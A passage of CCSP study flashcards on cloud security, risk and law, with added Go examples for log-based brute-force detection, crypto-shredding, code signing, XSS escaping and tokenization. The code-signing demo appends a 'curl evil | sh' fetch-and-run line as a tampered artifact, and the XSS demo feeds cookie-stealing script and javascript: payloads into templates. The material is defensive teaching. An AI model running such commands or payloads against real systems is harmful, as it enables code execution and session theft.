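2024-05-01T10:12:00Z 198.51.100.9 alice FAIL
2024-05-01T10:13:00Z 198.51.100.9 alice FAIL
2024-05-01T10:14:00Z 198.51.100.9 alice FAIL`

type event struct {
	at   time.Time
	ip   string
	user string
	ok   bool
}

// parseLog turns the raw lines into events; malformed lines are reported, not skipped silently.
func parseLog(raw string) ([]event, error) {
	var out []event
	for _, line := range strings.Split(strings.TrimSpace(raw), "\n") {
		f := strings.Fields(line)
		if len(f) != 4 {
			return nil, fmt.Errorf("malformed line: %q", line)
		}
		t, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			return nil, err
		}
		out = append(out, event{at: t, ip: f[1], user: f[2], ok: f[3] == "OK"})
	}
	return out, nil
}

// detectBruteForce flags a source IP once it has produced at least threshold failed logins
// inside a sliding window. Events are assumed to arrive in chronological order.
func detectBruteForce(events []event, threshold int, window time.Duration) []string {
	recent := map[string][]time.Time{}
	flagged := map[string]bool{}
	for _, e := range events {
		if e.ok {
			continue
		}
		q := append(recent[e.ip], e.at)
		for len(q) > 0 && e.at.Sub(q[0]) > window { // expire failures older than the window
			q = q[1:]
		}
		recent[e.ip] = q
		if len(q) >= threshold {
			flagged[e.ip] = true
		}
	}
	return sortedKeys(flagged)
}

// detectPasswordSpray flags a source IP that fails against at least minUsers distinct accounts:
// one or two attempts per account, spread over many accounts, stays under per-account lockout.
func detectPasswordSpray(events []event, minUsers int) []string {
	users := map[string]map[string]bool{}
	flagged := map[string]bool{}
	for _, e := range events {
		if e.ok {
			continue
		}
		if users[e.ip] == nil {
			users[e.ip] = map[string]bool{}
		}
		users[e.ip][e.user] = true
		if len(users[e.ip]) >= minUsers {
			flagged[e.ip] = true
		}
	}
	return sortedKeys(flagged)
}

func sortedKeys(m map[string]bool) []string {
	keys := make([]string, 0, len(m))
	for k := range m {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	return keys
}

func main() {
	events, err := parseLog(sampleLog)
	if err != nil {
		panic(err)
	}
	fmt.Println("brute force (5 failures / 1 min):", detectBruteForce(events, 5, time.Minute))
	fmt.Println("brute force (5 failures / 5 min):", detectBruteForce(events, 5, 5*time.Minute))
	fmt.Println("password spraying (>= 3 accounts):", detectPasswordSpray(events, 3))
}
```

A real SIEM rule would also key on the target account and correlate with a later successful login from the same source, since a success after many failures is the event that actually matters.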

152
Q

Digital Millennium Copyright Act (DMCA)

A

The DMCA deals with intellectual property and not specifically with personal privacy. It is not included in the CSA CCM.

153
Q

DRM requires that every data resource be provisioned with ….An access policy

A

For DRM to work properly, each resource needs to be outfitted with an access policy so that only authorized entities may make use of that resource

154
Q

Crypto-shredding

A

The proper procedure for crypto-shredding requires two cryptosystems (two layers of keys): one to encrypt the target data, the other to encrypt the resulting data encryption keys. Destroying the key-encrypting key then renders every wrapped data key, and with it all the data, unrecoverable.
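
An added example of the two-cryptosystem (envelope encryption) structure, written for this page and not taken from any storage product: each object gets its own data encryption key (DEK), the DEK is kept only in wrapped form under a key encryption key (KEK), and crypto-shredding an object means destroying its wrapped DEK. Re-wrapping moves an object to a new KEK without touching the bulk ciphertext, which is why the second layer exists. Type and function names are this example's own; the demo KEK is a constant and would come from a KMS or HSM in practice.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// aeadSeal encrypts with AES-256-GCM and prepends the random nonce; aeadOpen reverses it.
func aeadSeal(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	rand.Read(nonce) // crypto/rand; does not fail in current Go versions
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

func aeadOpen(key, sealed []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil || len(sealed) < gcm.NonceSize() {
		return nil, errors.New("bad key or ciphertext")
	}
	ns := gcm.NonceSize()
	return gcm.Open(nil, sealed[:ns], sealed[ns:], nil)
}

// Object is one stored item: ciphertext under its own DEK, plus that DEK wrapped under the KEK.
// The KEK never encrypts data directly, so changing it does not require re-encrypting the data.
type Object struct {
	Ciphertext []byte
	WrappedDEK []byte // nil once the object has been crypto-shredded
}

// Encrypt generates a fresh DEK, encrypts the data under it, and keeps the DEK only in wrapped form.
func Encrypt(kek, plaintext []byte) (*Object, error) {
	dek := make([]byte, 32)
	rand.Read(dek)
	ct, err := aeadSeal(dek, plaintext)
	if err != nil {
		return nil, err
	}
	wrapped, err := aeadSeal(kek, dek)
	if err != nil {
		return nil, err
	}
	return &Object{Ciphertext: ct, WrappedDEK: wrapped}, nil
}

// Decrypt unwraps the DEK with the KEK, then decrypts the data with the DEK.
func Decrypt(kek []byte, o *Object) ([]byte, error) {
	if o.WrappedDEK == nil {
		return nil, errors.New("object was crypto-shredded: its DEK no longer exists")
	}
	dek, err := aeadOpen(kek, o.WrappedDEK)
	if err != nil {
		return nil, err
	}
	return aeadOpen(dek, o.Ciphertext)
}

// Shred destroys the only copy of the DEK. The ciphertext may survive in replicas and backups,
// but without the key it is unrecoverable; a backed-up DEK would undo exactly this.
func Shred(o *Object) {
	for i := range o.WrappedDEK {
		o.WrappedDEK[i] = 0 // overwrite before dropping the reference
	}
	o.WrappedDEK = nil
}

// Rewrap moves an object to a new KEK (key rotation) by re-wrapping the DEK only.
func Rewrap(oldKEK, newKEK []byte, o *Object) error {
	if o.WrappedDEK == nil {
		return nil // nothing to rotate for a shredded object
	}
	dek, err := aeadOpen(oldKEK, o.WrappedDEK)
	if err != nil {
		return err
	}
	o.WrappedDEK, err = aeadSeal(newKEK, dek)
	return err
}

func main() {
	kek := make([]byte, 32) // constructed all-zero demo KEK; never do this outside an example
	o, _ := Encrypt(kek, []byte("secret report"))
	Shred(o)
	_, err := Decrypt(kek, o)
	fmt.Println("after shredding:", err)
}
```

Shredding every object at once is the same operation one level up: destroy the KEK, and every wrapped DEK becomes undecryptable without touching a single object.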

155
Q

Code Signing

A

Digitally signing software code lets recipients verify who published it and that it has not been modified since it was signed; the CCSP material also presents it as a method for determining original ownership that has proven effective in intellectual property rights disputes.
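
An added example of what a code-signing check actually verifies, written for this page rather than taken from any signing tool: the publisher signs a SHA-256 digest of the artifact, bound together with the package name and version, using an Ed25519 key; a consumer who trusts the public key can reject tampered bytes, a signature from a different publisher, or a valid signature transplanted onto another version. The SignedArtifact layout and all names are this example's own, not a standard format.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// SignedArtifact is what a publisher ships next to a release. The layout is constructed for this
// example; real tooling uses formats such as Authenticode, PGP signatures or Sigstore bundles.
type SignedArtifact struct {
	Name    string
	Version string
	Digest  [32]byte // SHA-256 of the artifact bytes
	Sig     []byte   // Ed25519 signature over name, version and digest
}

// signedMessage binds name and version into the signed data, so a valid signature cannot be
// transplanted onto another package or onto an older, vulnerable version of this one.
// Assumption: names and versions never contain NUL, which keeps the encoding unambiguous.
func signedMessage(name, version string, digest [32]byte) []byte {
	msg := []byte("artifact-v1\x00" + name + "\x00" + version + "\x00")
	return append(msg, digest[:]...)
}

// Sign hashes the artifact and signs the bound message with the publisher's private key.
func Sign(priv ed25519.PrivateKey, name, version string, artifact []byte) SignedArtifact {
	d := sha256.Sum256(artifact)
	return SignedArtifact{Name: name, Version: version, Digest: d,
		Sig: ed25519.Sign(priv, signedMessage(name, version, d))}
}

// Verify recomputes the digest over the bytes actually received and checks the signature with
// a public key the verifier already trusts (pinned here; chained to a CA certificate in practice).
func Verify(pub ed25519.PublicKey, sa SignedArtifact, artifact []byte) bool {
	d := sha256.Sum256(artifact)
	if d != sa.Digest {
		return false // received bytes differ from what the publisher signed
	}
	return ed25519.Verify(pub, signedMessage(sa.Name, sa.Version, d), sa.Sig)
}

func main() {
	pub, priv, err := ed25519.GenerateKey(nil) // nil reader selects crypto/rand
	if err != nil {
		panic(err)
	}
	artifact := []byte("#!/bin/sh\necho deploy\n") // constructed artifact
	sa := Sign(priv, "deploy-tool", "1.4.2", artifact)
	fmt.Println("signature:", hex.EncodeToString(sa.Sig)[:16]+"...")
	fmt.Println("genuine verifies:", Verify(pub, sa, artifact))
	fmt.Println("tampered verifies:", Verify(pub, sa, []byte(string(artifact)+"curl evil | sh\n")))
}
```

The signature proves only that someone holding the private key signed these exact bytes under this name and version; whether that key belongs to the publisher you think it does is a separate trust decision, which is what certificates and transparency logs exist to settle.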

156
Q

Copyright
Civil Court

A

Enforcement of copyright is usually a tortious civil action, as a conflict between private parties.

157
Q

Homomorphic encryption

A

Homomorphic encryption allows encrypted data to be manipulated (computed on) without decrypting it first; the CCSP material describes it as a theoretical technique, although working, if slow, fully homomorphic schemes now exist.

158
Q

Quantum computing

A

Quantum computing uses superposition of physical states (qubits) to increase computing capacity; the CCSP material describes it as a theoretical technology that would also increase encryption keyspace. A sufficiently large quantum computer would break RSA and elliptic-curve cryptography (Shor's algorithm), which is the motivation for post-quantum cryptography.

159
Q

DLP / DRM

A

Every additional security measure might reduce a potential threat, but it also carries an overhead cost, typically in productivity or quality of service.

DLP tools function better if appropriate and accurate classification and labeling is applied consistently throughout the environment.

161
Q

Risk

A

A vulnerability combined with a specific threat is defined as a risk.

162
Q

Business impact analysis (BIA)

A

Business impact analysis (BIA) is designed to identify and ascertain the value of assets in addition to the critical paths and processes.

163
Q

Mean time to repair (MTTR)

A

Mean time to repair (MTTR) is the time required to repair a device that has failed or is in need of repair. The term mean indicates the average time as opposed to the actual or past experiences.

164
Q

annual loss expectancy (ALE)

A

The term that best describes the amount an organization should expect to lose on an annual basis due to one type of incident is annual loss expectancy (ALE) and is calculated by multiplying the annual rate of occurrence (ARO) by the single loss expectancy (SLE).

165
Q

Heating, ventilation, and air-conditioning (HVAC)

A

Heating, ventilation, and air-conditioning (HVAC) systems separate the cool air from the heat caused by servers. They provide air management including racks with built-in ventilation or alternate cold/hot aisles.

166
Q

Hot aisle containment

A

Hot aisle containment is a configuration where the backs of the devices face each other, so the hot exhaust is confined to the contained aisle and the ambient temperature in the work area stays cool.

167
Q

Cold aisle containment

A

Cold aisle containment is a configuration where the fronts of devices face each other.

168
Q

Recovery point objective (RPO)

A

Recovery point objective (RPO) is a term used in BC and DR describing the tolerable amount of data that might be lost due to an outage before severe consequences are experienced.

169
Q

The maximum tolerable downtime/maximum allowable downtime (MTD/MAD)

A

The maximum tolerable downtime/maximum allowable downtime (MTD/MAD) is a point in time after an outage has occurred and beyond which recovery becomes extremely difficult or impossible.

170
Q

SDN

A

SDN is the idea of separating the network control plane from the actual network forwarding plane. This allows for greater control over networking capabilities and for integration of such things as APIs.

a means to centralize logical control of all networked nodes in the environment, abstracted from the physical connections to each

171
Q

In software-defined networking (SDN), the northbound interface (NBI)

A

The NBI usually handles traffic between the SDN controllers and SDN applications.

172
Q

Single sign-on (SSO)
federation

A

Single sign-on (SSO) is similar to federation, but it is limited to a single organization; federation is basically SSO across multiple organizations.

173
Q

Cross-certification

A

The cross-certification federation model is also known as a web of trust.

174
Q

liquid propane

A

Liquid propane does not spoil, which obviates necessity for continually refreshing and restocking it and might make it more cost-effective

175
Q

UPS

A

The UPS is intended to last only long enough to save production data currently being processed. The exact quantity of time will depend on many variables and will differ from one datacenter to the next.

176
Q

Line conditioning

A

A UPS can provide line conditioning, adjusting power so that it is optimized for the devices it serves and smoothing any power fluctuations.

177
Q

Mobile cloud storage

A

Mobile cloud storage is defined as a form of cloud storage that applies to storing an individual’s mobile device data in the cloud and providing the individual with access to the data from anywhere

178
Q

The purpose of the transfer switch

A

The purpose of the transfer switch is to redirect power consumption from utility power to generator power; this must happen fast enough that the generator is supplying power before the UPS batteries are exhausted.

179
Q

controls

A

Controls are mechanisms designed to restrict a list of possible actions down to allowed or permitted actions.

180
Q

Security Assertion Markup Language (SAML)

A

Security Assertion Markup Language (SAML) is based on XML. HTTP is used for port 80 web traffic; HTML is used to present web pages

181
Q

Ping, Power, Pipe

A

Remote access for customer to racked devices in the data center; electrical utilities; connectivity to an Internet service provider (ISP)/the Internet

182
Q

Cloud Carrier

A

The ISP between the cloud customer and provider

183
Q

Challenge of operating in the cloud is that additional controls must be placed on file storage systems

A

VMs are snapshotted and simply stored as files when they are not being used; an attacker who gains access to those file stores could ostensibly steal entire machines in highly portable, easily copied formats. Therefore, these cloud storage spaces must include a significant amount of controls.

184
Q

Object storage

A

Snapshotted VM images are usually kept in object storage, as files.

185
Q

Host escape

A

the situation when a malicious user or attacker can exit the restrictions of a single host and access other nodes on the network

186
Q

Guest Escape

A

the situation when a malicious user or attacker can exit the restrictions of a virtual machine (VM) and access another VM residing on the same host

187
Q

automation of configuration helps

A

A secure baseline configuration, applied and maintained automatically, ensures the optimum security footprint with the least attack surface.

188
Q

cross-certification federation model
web of trust - federation model

A

The cross-certification federation model is also known as a web of trust.

In a web of trust federation model, all of the participating organizations are identity providers; each organization will assign identity credentials to its own authorized users, and all the other organizations in the federation will accept those credentials.

In this model every participating organization is both an identity provider and a service provider.

189
Q

Proxy federation model

A

In the proxy federation model, the third party acts on behalf of the member organizations, reviewing each to ensure that they are all acceptable to the others

190
Q

cloud data center audit - Challenges

A

Cloud providers may be reluctant to grant physical access, even to their customers, on the assumption that allowing access would disclose information about security controls. In some cases, cloud customers won’t even know the location(s) of the data center(s) where their data is stored

a cloud audit will depend on which information a cloud provider discloses, which makes auditing difficult and less trustworthy

They frequently rely on third parties: Because cloud audits are often the result of third-party assertions, recipients of cloud audit reports may be more skeptical of the results than they would have been of traditional audits, in which the recipients may have performed firsthand.

191
Q

controls would be useful to build into a virtual machine baseline image for a cloud environment

A

Automated vulnerability scan on system startup

Automatic registration with the configuration management system

192
Q

Having your BC/DR backup stored with the same cloud provider as your production environment can help in

A

Having the backup within the same environment can allow easy rollback to a last known good state or to reinstantiate clean VM images after minor incidents (e.g., a malware infection in certain VMs).

193
Q

The BC/DR plan/policy: what it need not include, and what it must include

A

It need not include full copies of governance documents; referencing them is sufficient.

It should include:
Tasking for the office responsible for maintaining/enforcing the plan

Contact information for essential entities, including BC/DR personnel and emergency services agencies

Checklists for BC/DR personnel to follow

194
Q

Opportunity …Risk

A

Risk should always be considered from a business perspective. Risk is often balanced by a corresponding opportunity.

195
Q

new risk in the cloud, not affecting the traditional, on-premise environment

A

Legal seizure of another firm’s assets

Resource exhaustion

Multitenancy

196
Q

Inference Attacks

A

While it is possible that one guest VM seeing the resource calls of another VM could possibly allow one guest to see the other’s data, it’s much more likely that a user seeing another user’s use of resources, rather than raw data, would allow the viewer to infer something about the victim’s behavior/usage/assets.

197
Q

ENISA –IAM

A

According to ENISA, custom IAM builds can become weak if not properly implemented.

198
Q

Credential revocation

A

Revoking credentials that might be lost when a device goes missing is a way to mitigate the possibility of those credentials being used by an unauthorized person.

199
Q

RTO , MAD

A

The RTO must always be less than the MAD.

The RTO is the measure of time after an interruption by which the company needs to resume critical functions; any service migration (failover) must take place within that time.

RTOs vary for every organization; there is no set answer that is correct in the general case, because an organization's RTO cannot be known without knowing more about the organization.

200
Q

Social engineering - Pen testing

A

Cloud providers will probably not allow social engineering (of the provider's staff) as part of a customer's penetration test.

201
Q

pen test, prosecution

A

A cloud customer performing a penetration test without the provider’s permission is risking … Prosecution

A penetration test requires the tester to analyze the security of an environment from the perspective of an attacker; this also includes actually taking action that would result in breaching that environment.

202
Q

security controls, VM

A

Security controls operating on a guest VM OS are only active while the VM is active; when the VM is stored, it is snapshotted and saved as a file, so those controls won’t be active either.

203
Q

Which of the following is a risk in the cloud environment that does not exist or is not as prevalent in the traditional environment

A

Legal liability in multiple jurisdictions
Loss of availability due to DDoS

204
Q

A virtual network interface card (NIC)

A

The virtualized NIC is part of the Data-Link layer.

205
Q

CDN, SaaS

A

CDNs are often used in conjunction with SaaS services to deliver high-quality data of large sizes (often multimedia).

206
Q

FM-200

A

FM-200 is used as a replacement for older Halon systems specifically because it (unlike Halon) does not deplete the ozone layer.

207
Q

Converged networking model

A

Optimized for cloud deployments, the converged networking model combines the underlying storage and IP networks to maximize the benefits of a cloud workload.

208
Q

DR Sites - Hot, cold, warm

A

Hot site: A fully functional data center that’s usually kept ready around the clock. It’s a near duplicate of an organization’s primary site, with complete backups of user data and full computer systems. Hot sites are the most expensive option and are best for businesses with zero tolerance for downtime and data loss

Warm site: A data center that’s equipped with some or all of the hardware, software, and network services found in a working data center, but doesn’t have live data. Warm sites are a good option for businesses with a lower budget and a need for flexible and fast recovery

Cold site: An empty operational space with basic facilities like air conditioning, power, and communication lines. Cold sites have no or little equipment or hardware, and no network connectivity or data synchronization. Before a cold site can be used, backup data and additional hardware must be sent to the site and installed.

209
Q

CDN - handles DDoS attacks

A

A content delivery network (CDN) run by a major provider can handle large-scale DDoS attacks more easily than any of the other solutions. Using DDoS mitigation techniques via an ISP is the next most useful capability, followed by both increases in bandwidth and increases in the number of servers in the web application cluster.

210
Q

packet capture , most accurate reconstruction of user activity

A

full packet capture provides the most accurate reconstruction of user activity, but it is costly to implement due to data storage requirements.

211
Q

2 different cloud providers - most significant risk

one cloud provider for your operational environment and another for BC/DR backup/archive?

A

When using two different cloud providers, a cloud customer runs the risk that data/software formats used in the operational environment can’t be readily adapted to the other provider’s service, thus causing delays during an actual failover.

212
Q

Organizational Normative Framework (ONF)

A

A framework of containers for all components of application security, best practices, catalogued and leveraged by the organization

213
Q

APIs

A

A set of routines, standards, protocols, and tools for building software applications to access a web based software application or tool

214
Q

ONF - ANF

A

there is a one-to-many ratio of Organizational Normative Framework (ONF) to Application normative framework (ANF); each organization has one Organizational Normative Framework (ONF) and many ANFs (one for each application in the organization). Therefore, the Application normative framework (ANF) is a subset of the Organizational Normative Framework (ONF).

215
Q

SAML

A

A standard for exchanging authentication and authorization data between security domains

216
Q

the purpose and scope of International Organization for Standardization (ISO)/International electrotechnical commission (IEC) 27034 1

A

Provides an overview of application security that introduces definitive concepts, principles, and processes involved in application security

217
Q

Database activity monitoring (DAM) can be

A

Host based or network based

A DAM can recognize and block malicious SQL traffic.

218
Q

WAF - Layer 7

A

WAFs operate at Layer 7 of the OSI model.

219
Q

DAST

Fuzz testing

A

Test performed on an application or software product while it is executing (in memory, under an operating system), without access to the source code.

Fuzz testing is one dynamic testing method: it feeds the program known bad and malformed inputs in order to determine how it handles the "wrong" data (does it crash, does it fail into a state that is less secure than normal operations, etc.).

220
Q

Sandbox

A

A test environment that isolates untrusted code changes for testing in a nonproduction environment

Sandboxing is often used for testing applications in development or carving out resources that cannot then touch other parts of the same system.

A sandbox can be used to run malware for analysis purposes as it won’t affect (or infect) the production environment; it’s worth noting, though, that some malware is sandbox-aware, so additional antimalware measures are advisable.

221
Q

three types of training

A

Initial, Recurring, Refresher

222
Q

Federation

A

Federation is an arrangement that can be made among multiple enterprises allowing them to use the same identification data to obtain access to all enterprises’ resources within the group.

223
Q

REST

A

Representational State Transfer (REST) relies on stateless, client-server, cacheable communications. It is a software architecture consisting of guidelines and best practices for creating scalable web services.

224
Q

OpenID

A

OpenID is one form of authentication used to enable SSO and enables the user to log into more than one application or website using the same credentials.

225
Q

Return on investment (ROI)

A

Return on investment (ROI) is a profitability ratio: the net gain (or loss) from an investment divided by the cost of that investment.

226
Q

A cross-site scripting (XSS)

A

A cross-site scripting (XSS) attack occurs when an application receives untrusted data and sends it to a web browser without proper validation or escaping, allowing an attacker to execute scripts in the user's browser, hijack sessions, or engage in other malicious behavior.

Techniques to reduce XSS:
Put untrusted data only in allowed slots of HTML documents.

HTML-escape untrusted data before including it in HTML element content.

Attribute-escape untrusted data before including it in HTML attributes.

Use an auto-escaping template system.

HTML-escape JSON values placed in an HTML context and read the data with JSON.parse.

Sanitize HTML markup with a library designed for the purpose.
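
An added Go example (not from the flashcard source) of the "use an auto-escaping template system" rule: the same page template is rendered once with text/template, which substitutes untrusted input verbatim, and once with html/template, which escapes each value for the context it lands in (HTML text, an href attribute, a JavaScript value). The template and the attacker strings are constructed for this example; the escaped outputs are what Go's standard library produces.

```go
package main

import (
	"bytes"
	"fmt"
	htmltpl "html/template"
	texttpl "text/template"
)

// One page template with three slots in different contexts: HTML body text, a URL attribute,
// and a JavaScript value. Each slot needs a different escaping rule to be safe.
const page = `<p>Hello, {{.Name}}</p>
<a href="{{.Link}}">profile</a>
<script>var user = {{.Name}};</script>`

type viewData struct{ Name, Link string }

// Constructed attacker-controlled input, e.g. submitted through a profile form.
var attacker = viewData{
	Name: `<script>alert(document.cookie)</script>`,
	Link: `javascript:alert(1)`,
}

// renderUnsafe uses text/template, which substitutes values verbatim: this is the XSS bug.
func renderUnsafe(d viewData) string {
	var b bytes.Buffer
	if err := texttpl.Must(texttpl.New("page").Parse(page)).Execute(&b, d); err != nil {
		panic(err)
	}
	return b.String()
}

// renderSafe uses html/template, which parses the template and escapes each value for the
// context it lands in: entities in HTML text, scheme filtering in href, a JSON literal in JS.
func renderSafe(d viewData) string {
	var b bytes.Buffer
	if err := htmltpl.Must(htmltpl.New("page").Parse(page)).Execute(&b, d); err != nil {
		panic(err)
	}
	return b.String()
}

func main() {
	fmt.Println("--- text/template (vulnerable) ---")
	fmt.Println(renderUnsafe(attacker))
	fmt.Println("--- html/template (context-aware auto-escaping) ---")
	fmt.Println(renderSafe(attacker))
}
```

The auto-escaping version turns the name into `&lt;script&gt;...` in the paragraph, replaces the javascript: URL with the inert `#ZgotmplZ` marker, and emits the JS value as a JSON string with `\u003c` escapes, so the same attacker input is harmless in all three slots without the developer choosing an escaper per slot.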

227
Q

Layer 7

A

API Gateway
Database
WAF

228
Q

Process isolation

A

Process isolation can reduce the possibility of side-channel attacks in an environment with shared resources.

229
Q

ISO 27034 mandates a framework for application security within an organization

A

Organizational Normative Framework (ONF), Application Normative Framework (ANF)

230
Q

RESTful responses can come from the server

A

Extensible Markup Language (XML), JavaScript Object Notation (JSON)

231
Q

Data owners

A

The data owner is responsible for the disposition of the data under their control; this includes access decisions.

232
Q

Forklifting

A

an informal industry term for moving applications from a traditional environment into the cloud

233
Q

Cloud migration

A

Cloud migration is the process of transitioning all or part of a company’s data, applications, and services from onsite premises behind the firewall to the cloud. This enables information to be provided over the Internet on an on-demand basis.

234
Q

OpenID Connect

A

OpenID Connect is a federation protocol that uses representational state transfer (REST) and JavaScript Object Notation (JSON); it was specifically designed with mobile apps in mind, instead of only web-based federation.

WS-Federation is a federation protocol that is part of the WS-Security family of standards and reliant on Simple Object Access Protocol (SOAP)

235
Q

federated protocols :

OAuth2
OpenID
SAML

A

Open federated protocols like SAML, OAuth 2.0, and OpenID Connect. (OAuth 2.0 is an authorization framework; OpenID Connect adds an authentication/identity layer on top of it.)

236
Q

multifactor authentication

A

For high-risk operations and data that is particularly sensitive

237
Q

The XML gateway

A

Which security tool can perform content inspection of Secure File Transfer Protocol (SFTP) communications?

The XML gateway can provide this functionality; it acts as a reverse proxy and can perform content inspection on many traffic protocols.

238
Q

Application virtualization can typically be used for

A

Running an application on an endpoint without installing it
Running an application in a non-native environment

239
Q

TLS

A

TLS maintains the confidentiality and integrity of communications, often between a web browser and a server.

TLS uses symmetric key crypto for each communications session in order to secure the connection; the session key is uniquely generated each time a new connection is made

240
Q

Vulnerability scans
vulnerability signatures

A

Vulnerability scans use signatures of known vulnerabilities to detect and report those vulnerabilities.

241
Q

DAST :
SAST:

A

DAST:Path coverage
SAST: Code coverage

242
Q

Tokenization

A

Tokenization supports compliance with the Payment Card Industry Data Security Standard (PCI DSS).

By replacing primary account numbers (PANs) with tokens and offloading the cardholder data to a tokenizing third party, merchants can take most of their own systems out of PCI DSS scope; only the token vault (and whatever can reach it) still holds cardholder data at rest.
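
An added example (not part of the deck and not any tokenization vendor's code) of a token vault in Go: the merchant keeps only tokens, and the vault keeps the PAN-to-token mapping. Tokens are format-preserving (same length, digits only, last four digits kept for receipts) but are deliberately made to fail the Luhn check, so a token can never collide with, or be mistaken for, a real card number. The number 4111111111111111 is the well-known Visa test value, not a live account; type and method names are this example's own.

```go
package main

import (
	"crypto/rand"
	"errors"
	"fmt"
	"regexp"
	"sync"
)

var panPattern = regexp.MustCompile(`^[0-9]{13,19}$`)

// luhnValid is the checksum every real PAN satisfies.
func luhnValid(s string) bool {
	sum, double := 0, false
	for i := len(s) - 1; i >= 0; i-- {
		d := int(s[i] - '0')
		if double {
			d *= 2
			if d > 9 {
				d -= 9
			}
		}
		sum += d
		double = !double
	}
	return sum%10 == 0
}

// randomDigits draws n unbiased decimal digits from crypto/rand (rejection sampling on bytes).
func randomDigits(n int) (string, error) {
	out := make([]byte, 0, n)
	buf := make([]byte, 1)
	for len(out) < n {
		if _, err := rand.Read(buf); err != nil {
			return "", err
		}
		if buf[0] < 250 { // 250 is a multiple of 10, so buf[0]%10 is uniform
			out = append(out, '0'+buf[0]%10)
		}
	}
	return string(out), nil
}

// Vault is the tokenization service's store. It is the one component that still holds PANs,
// so it (not the merchant's application or database) is what stays in PCI DSS scope.
type Vault struct {
	mu      sync.Mutex
	byToken map[string]string
	byPAN   map[string]string
}

func NewVault() *Vault {
	return &Vault{byToken: map[string]string{}, byPAN: map[string]string{}}
}

// Tokenize returns a format-preserving token: same length, digits only, last four digits kept,
// the rest random. The token is forced to fail Luhn so it can never be a valid card number.
func (v *Vault) Tokenize(pan string) (string, error) {
	if !panPattern.MatchString(pan) || !luhnValid(pan) {
		return "", errors.New("input is not a valid PAN")
	}
	v.mu.Lock()
	defer v.mu.Unlock()
	if tok, ok := v.byPAN[pan]; ok {
		return tok, nil // same card, same token: lets the merchant recognise repeat customers
	}
	for {
		prefix, err := randomDigits(len(pan) - 4)
		if err != nil {
			return "", err
		}
		tok := prefix + pan[len(pan)-4:]
		if _, taken := v.byToken[tok]; taken || luhnValid(tok) {
			continue
		}
		v.byToken[tok] = pan
		v.byPAN[pan] = tok
		return tok, nil
	}
}

// Detokenize is the privileged operation, exposed only to systems that genuinely need the PAN.
func (v *Vault) Detokenize(tok string) (string, error) {
	v.mu.Lock()
	defer v.mu.Unlock()
	pan, ok := v.byToken[tok]
	if !ok {
		return "", errors.New("unknown token")
	}
	return pan, nil
}

func main() {
	v := NewVault()
	tok, err := v.Tokenize("4111111111111111") // well-known test card number, not a real account
	fmt.Println("token:", tok, "err:", err)
}
```

The token carries no cryptographic relationship to the PAN, so a stolen token database is worthless without the vault; that is the property that lets PCI DSS scope shrink to the vault and its access paths.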

243
Q

A cloud-based sandbox should not be used for running malware samples (malware analysis)

A

Installing malware on systems owned by someone else may be illegal in many jurisdictions. An on-premises sandbox is fine for this purpose, but doing the same thing in the cloud may be a crime, and will usually violate the provider's acceptable use policy.

244
Q

ISO 27034

A

ISO 27034 addresses the sets of controls used in software throughout the environment.

245
Q

Open source

open source review

A

Open source software includes programs where customers (or even the public) can view the software’s source code.

Open source review can detect flaws /programming defects that a structured testing method might not.

247
Q

REST

A

REST calls web resources by using uniform resource identifiers (URIs).

248
Q

The Agile method

A

The Agile method reduces the dependence and importance of documentation in favor of functioning software versions.

249
Q

Threat modelling

STRIDE
DREAD
ATASM
PASTA

A

Threat modeling methodologies: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege (STRIDE); Damage potential, Reproducibility, Exploitability, Affected Users, and Discoverability (DREAD); Architecture, Threats, Attack Surfaces, and Mitigations (ATASM); Process for Attack Simulation and Threat Analysis (PASTA).

250
Q

Overview of the CSA STAR framework

A

The STAR program’s open certification framework contains three levels: self-assessment (Level 1), third-party audit (Level 2), and continuous auditing (Level 3).

252
Q

SOC report subtypes: which represents a point in time, and which spans a period of time?

A

A SOC Type I report is designed around a specific point in time: it reports on the design of the controls as of that date, not on their effectiveness over a period.

A SOC Type II report is designed around a period of time: it reports on the operating effectiveness of the controls over that period (typically six to twelve months).

253
Q

The doctrine of the proper law

A

The doctrine of the proper law refers to how jurisdictional disputes are settled.

254
Q

The silver platter doctrine

A

The silver platter doctrine allows law enforcement entities to use material presented voluntarily by the owner as evidence in the prosecution of crimes, without a warrant or a court order.

255
Q

The doctrine of plain view

A

The doctrine of plain view allows law enforcement to act on probable cause when evidence of a crime is within their presence

256
Q

The Restatement (Second) Conflict of Law

A

The Restatement (Second) Conflict of Law is the basis used for determining which laws are most appropriate in a situation where conflicting laws exist.

257
Q

The Stored Communication Act (SCA)

A

The Stored Communications Act (SCA), enacted in 1986 as part of the Electronic Communications Privacy Act (ECPA), is old, badly in need of updating, and unclear with regard to newer technologies such as cloud storage.

258
Q

KRI stands for key risk indicator.

A

KRI stands for key risk indicator. KRIs are the red flags if you will in the world of risk management. When these change, they indicate something is amiss and should be looked at quickly to determine if the change is minor or indicative of something important.

259
Q

International Organization for Standardization (ISO) 31000:2009

design implementation and management

A

International Organization for Standardization (ISO) 31000:2009 specifically focuses on design implementation and management

260
Q

International Organization for Standardization (ISO) 27017

cloud specific security controls

A

International Organization for Standardization (ISO) 27017 is about cloud specific security controls

261
Q

ISO 27050 - eDiscovery

A

is an industry standard that provides guidance for eDiscovery programs.

263
Q

National Institute of Standards and Technology (NIST) 800-92

Log management

A

National Institute of Standards and Technology (NIST) 800-92 is about log management.

264
Q

ENISA - the top 8 security risks based on likelihood and impact.

A

European Union Agency for Network and Information Security (ENISA) specifically identifies the top 8 security risks based on likelihood and impact.

European Union Agency for Network and Information Security (ENISA) identifies 35 types of risks organizations should consider but goes further by identifying the top eight security risks based on likelihood and impact.

265
Q

International Organization for Standardization (ISO)/International electrotechnical commission (IEC) 28000:2007

A

ISO/IEC 28000:2007 addresses security risks in a supply chain.

266
Q

International Organization for Standardization (ISO) 31000:2009

A

International Organization for Standardization (ISO) 31000:2009 is an international standard that focuses on designing, implementing, and reviewing risk management processes and practices.

267
Q

